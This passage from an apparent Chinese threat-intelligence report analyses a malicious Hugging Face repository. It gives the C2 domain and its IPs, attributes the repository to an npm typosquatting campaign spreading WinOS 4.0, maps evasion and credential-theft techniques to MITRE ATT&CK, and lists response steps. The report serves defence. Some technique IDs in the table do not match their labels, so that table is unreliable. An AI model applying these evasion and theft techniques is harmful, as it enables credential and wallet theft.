&#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">窃取的数据经过压缩后通过 HTTP 协议外泄至 C2 服务器 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">recargapopular[.]com</span></strong><span leaf="">。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">C2 基础设施分析</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">根据关联分析，C2 域名 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">recargapopular.com</span></strong><span leaf=""> 的基础信息如下：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">属性</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">详情</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">注册时间</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-02-16</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">到期时间</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2027-02-16</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">注册商</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">TUCOWS.COM, CO.</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">名称服务器</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">deborah.ns.cloudflare.com / west.ns.cloudflare.com</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">当前解析 IP</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">172.67.165.218 / 104.21.66.235</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">安全状态</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">未见公开恶意标记</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该域名于攻击事件前约三个月注册，使用 Cloudflare 名称服务器隐藏真实基础设施。注册时间与攻击活动时序的高度相关性表明，这是一次有预谋的基础设施部署。C2 服务器通过 Cloudflare CDN 节点中转，显著增加了溯源难度。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁归因</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">HiddenLayer 研究人员发现此次攻击与 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">npm typosquatting 活动</span></strong><span leaf="">存在直接关联。攻击者使用相同的 loader 基础设施分发 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">WinOS 4.0</span></strong><span leaf=""> 植入程序，表明同一威胁行为体正在多个开源生态系统同步运营。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">关键归因线索：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">基础设施重叠</span></b><span leaf="">：loader.py 脚本与 npm 恶意包的代码结构高度相似</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">TTP 一致性</span></b><span leaf="">：两起攻击采用相同的 C2 通信模式和数据外泄格式</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">时间关联</span></b><span leaf="">：活动间隔符合同一操作团队的运营节奏</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">此次攻击活动体现了现代网络犯罪的组织化特征：攻击者具备跨平台运营能力，能够根据不同平台特点调整投递策略，同时维护底层基础设施的统一性。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MITRE ATT&amp;CK 映射</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">战术阶段</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术编号</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术名称</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">初始访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1661</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">钓鱼攻击（通过社会工程实现）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">初始访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1526</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">供应链攻陷</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1547.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">引导登录完成时自启动（添加 Defender 排除列表）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">防御规避</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1562.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">禁用安全工具（禁用 SSL 验证）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">防御规避</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1562.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">添加安全工具排除项</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">防御规避</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1497.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">虚拟机/沙箱检测</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">凭证访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1555.003</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">浏览器凭证窃取</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">凭证访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1552.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">凭据文件未保护存储</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">凭证访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1552.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">私钥窃取</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">发现</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1592.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">收集受害者主机信息</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">数据外泄</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1041</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通过 C2 信道外泄数据</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">防御建议</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对于已下载该恶意仓库内容的用户，奇安信威胁情报中心建议采取以下响应措施：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">系统重置</span></b><span leaf="">：立即重新映像受感染主机，确保恶意 payload 及持久化机制被完全清除</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">凭证轮换</span></b><span leaf="">：轮换所有存储在受影响系统中的密码、API 密钥、SSH 密钥</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">加密资产保护</span></b><span leaf="">：更换所有加密货币钱包，废弃相关种子短语和私钥</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">会话失效</span></b><span leaf="">：使所有浏览器会话令牌失效，重置双因素认证凭证</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">日志审计</span></b><span leaf="">：审查近期的登录活动，识别是否存在异常访问行为</span></span></li></ol><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对于 AI 开发社区，我们建议：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">在安装任何第三方模型前，验证仓库的官方来源和发布者身份</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">启用仓库的签名验证功能，验证代码完整性</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">避免依赖下载量作为信任依据，该指标可被人为操纵</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">在隔离环境（如沙箱虚拟机）中测试新获取的模型和代码</span></span></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结论</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">此次事件是开源 AI 生态系统面临供应链攻击风险的典型案例。Hugging Face 作为全球领先的 AI 模型托管平台，每日承载大量模型分发任务，其信任机制被攻击者利用进行大规模恶意软件传播。Sefirah 